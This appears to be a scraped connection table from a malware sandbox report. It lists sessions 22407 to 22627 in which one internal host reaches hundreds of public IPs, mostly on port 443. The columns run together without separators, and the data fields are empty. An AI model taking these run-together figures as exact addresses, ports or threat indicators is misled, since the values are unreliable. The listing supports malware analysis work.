                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22407192.168.2.233685868.126.25.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22408192.168.2.2348202123.162.33.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22409192.168.2.2345848105.160.42.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22410192.168.2.2341556166.133.235.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22411192.168.2.234661446.82.83.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22412192.168.2.2342986156.19.224.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22413192.168.2.233288277.108.28.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22414192.168.2.234645476.11.2.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22415192.168.2.23393904.22.29.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22416192.168.2.2341670178.93.127.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22417192.168.2.234187017.136.253.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22418192.168.2.233771648.216.5.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22419192.168.2.2344450152.252.206.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22420192.168.2.234428834.180.175.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22421192.168.2.2348700222.66.239.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22422192.168.2.233479869.50.212.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22423192.168.2.235924699.194.126.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22424192.168.2.235024658.14.175.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22425192.168.2.2354902198.29.3.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22426192.168.2.2358004163.199.46.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22427192.168.2.23355088.162.153.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22428192.168.2.2356546222.43.119.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22429192.168.2.23535045.35.18.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22430192.168.2.234095635.231.224.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22431192.168.2.2359286211.179.42.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22432192.168.2.2345942147.161.228.2018080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22433192.168.2.234043294.122.232.1768080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22434192.168.2.2357782102.132.137.2398080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22435192.168.2.2349518154.130.163.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22436192.168.2.2344966174.42.111.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22437192.168.2.233951866.161.216.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22438192.168.2.2344096152.227.161.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22439192.168.2.2347258213.186.144.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22440192.168.2.2335462197.206.10.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22441192.168.2.2341498183.106.240.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22442192.168.2.235840094.251.39.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22443192.168.2.234178263.199.107.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22444192.168.2.234922871.151.100.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22445192.168.2.234301290.119.249.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22446192.168.2.2348488182.200.166.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22447192.168.2.236020066.54.157.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22448192.168.2.2342090206.66.250.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22449192.168.2.234969696.230.60.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22450192.168.2.235780078.52.201.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22451192.168.2.235034496.236.61.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22452192.168.2.234825649.85.93.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22453192.168.2.2333536135.253.138.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22454192.168.2.2340906101.167.14.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22455192.168.2.2359518165.12.183.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22456192.168.2.2335358143.151.37.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22457192.168.2.23427125.222.210.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22458192.168.2.2353856188.185.169.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22459192.168.2.2342792137.23.77.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22460192.168.2.2336726187.160.217.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22461192.168.2.2356448130.25.121.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22462192.168.2.23526441.13.233.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22463192.168.2.2338990189.228.92.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22464192.168.2.2333664220.11.23.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22465192.168.2.2354142122.200.44.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22466192.168.2.234052857.254.239.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22467192.168.2.2346108150.70.172.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22468192.168.2.2358280111.67.203.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22469192.168.2.2346478218.163.171.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22470192.168.2.2349864130.1.37.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22471192.168.2.233671454.168.115.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22472192.168.2.234161253.132.27.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22473192.168.2.233852089.136.217.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22474192.168.2.2355000196.87.113.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22475192.168.2.234780270.215.150.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22476192.168.2.2337670207.185.84.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22477192.168.2.2345616134.231.144.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22478192.168.2.2337760115.160.221.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22479192.168.2.2351228135.184.141.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22480192.168.2.2359500131.103.18.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22481192.168.2.2348704191.86.75.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22482192.168.2.233478048.207.15.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22483192.168.2.2348564195.246.131.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22484192.168.2.2358818117.201.118.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22485192.168.2.2345676156.162.92.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22486192.168.2.2357290108.134.230.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22487192.168.2.234349019.76.228.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22488192.168.2.2358944159.186.187.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22489192.168.2.2337990180.172.206.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22490192.168.2.233653061.153.118.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22491192.168.2.2355320180.165.134.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22492192.168.2.233425476.220.82.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22493192.168.2.2352780156.83.131.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22494192.168.2.2346902216.48.15.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22495192.168.2.2350034104.173.95.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22496192.168.2.23450501.47.153.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22497192.168.2.234681466.25.150.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22498192.168.2.2337706178.250.103.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22499192.168.2.2359512159.209.126.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22500192.168.2.2346650112.226.154.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22501192.168.2.233516696.135.65.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22502192.168.2.2360818185.200.250.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22503192.168.2.234730479.212.97.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22504192.168.2.2337252212.46.118.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22505192.168.2.235941286.40.161.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22506192.168.2.2340980151.3.79.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22507192.168.2.235708432.235.131.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22508192.168.2.2336670175.252.80.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22509192.168.2.234854664.2.221.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22510192.168.2.2347968148.168.171.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22511192.168.2.2341366179.144.90.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22512192.168.2.2359402175.235.71.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22513192.168.2.2333952190.198.167.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22514192.168.2.233677874.86.98.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22515192.168.2.235770083.252.80.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22516192.168.2.233339279.113.41.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22517192.168.2.2346212121.22.188.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22518192.168.2.233745438.218.139.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22519192.168.2.2356726208.240.68.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22520192.168.2.236087489.46.235.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22521192.168.2.2344080187.206.224.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22522192.168.2.2357924129.32.165.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22523192.168.2.2350400176.30.78.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22524192.168.2.2355324179.197.37.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22525192.168.2.235628851.155.7.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22526192.168.2.2346608108.54.224.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22527192.168.2.2351866161.54.94.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22528192.168.2.2354992154.87.53.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22529192.168.2.234303882.178.189.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22530192.168.2.2349904129.236.49.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22531192.168.2.2333786148.75.31.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22532192.168.2.23494701.106.132.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22533192.168.2.234064095.247.10.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22534192.168.2.2344716101.132.220.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22535192.168.2.2350756187.227.63.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22536192.168.2.234926235.105.43.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22537192.168.2.233748886.132.235.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22538192.168.2.2350926116.149.66.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22539192.168.2.2343960168.211.28.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22540192.168.2.233620485.65.127.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22541192.168.2.235817687.3.178.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22542192.168.2.2344774201.253.54.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22543192.168.2.234942032.223.249.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22544192.168.2.2353870105.95.19.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22545192.168.2.2346166193.190.176.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22546192.168.2.236082236.66.41.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22547192.168.2.2354986174.143.13.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22548192.168.2.2354650141.43.202.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22549192.168.2.2354016112.85.42.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22550192.168.2.235307285.230.43.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22551192.168.2.2348106220.87.175.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22552192.168.2.2348470171.16.242.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22553192.168.2.2356690207.125.233.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22554192.168.2.2335850190.53.231.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22555192.168.2.2351776135.110.30.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22556192.168.2.234559677.62.24.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22557192.168.2.2336202167.45.224.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22558192.168.2.2342452185.253.97.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22559192.168.2.2336644101.196.227.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22560192.168.2.2358208145.60.251.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22561192.168.2.234514074.177.78.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22562192.168.2.2334244174.54.161.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22563192.168.2.2344862116.35.167.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22564192.168.2.2347222133.1.207.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22565192.168.2.2358884188.86.182.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22566192.168.2.235128853.95.203.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22567192.168.2.2340220110.158.183.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22568192.168.2.2335228217.117.173.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22569192.168.2.2353622138.61.204.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22570192.168.2.2332988139.144.125.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22571192.168.2.2356640104.253.37.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22572192.168.2.234188899.2.233.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22573192.168.2.2358444154.245.124.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22574192.168.2.2335352218.214.83.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22575192.168.2.235986472.67.31.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22576192.168.2.2350148193.90.191.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22577192.168.2.233552435.237.208.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22578192.168.2.2360154138.221.37.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22579192.168.2.234318290.199.164.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22580192.168.2.234959482.43.190.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22581192.168.2.2341148168.63.46.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22582192.168.2.2353036222.199.90.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22583192.168.2.2351626179.173.101.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22584192.168.2.235605871.115.188.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22585192.168.2.234159869.30.246.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22586192.168.2.2356222182.169.31.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22587192.168.2.234690653.194.214.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22588192.168.2.2345150212.170.1.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22589192.168.2.234409640.212.142.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22590192.168.2.234771454.184.69.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22591192.168.2.234030818.246.16.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22592192.168.2.233984241.206.120.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22593192.168.2.2358182184.223.162.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22594192.168.2.235167623.126.217.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22595192.168.2.2335308180.91.118.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22596192.168.2.2334190176.248.110.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22597192.168.2.2351220185.0.213.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22598192.168.2.2345572223.154.64.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22599192.168.2.2339442149.235.229.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22600192.168.2.235332449.43.99.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22601192.168.2.2353790141.132.81.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22602192.168.2.2348712189.184.107.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22603192.168.2.2340508140.83.226.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22604192.168.2.234938023.47.218.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22605192.168.2.2345998139.231.102.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22606192.168.2.2351822170.224.70.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22607192.168.2.233340018.4.183.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22608192.168.2.2334280220.181.254.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22609192.168.2.2353944166.7.163.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22610192.168.2.2350010120.82.135.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22611192.168.2.233837862.78.236.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22612192.168.2.2334434115.85.185.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22613192.168.2.2349566128.234.130.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22614192.168.2.2342856111.100.83.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22615192.168.2.235678863.29.67.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22616192.168.2.2338716148.249.200.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22617192.168.2.233723484.210.35.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22618192.168.2.2349602115.11.93.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22619192.168.2.233736879.212.118.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22620192.168.2.2356842146.121.167.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22621192.168.2.2356556129.164.177.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22622192.168.2.234954280.6.67.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22623192.168.2.234187269.248.165.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22624192.168.2.2358654122.7.20.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22625192.168.2.235989090.215.12.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22626192.168.2.233919614.180.202.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22627192.168.2.2360370211.253.181.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
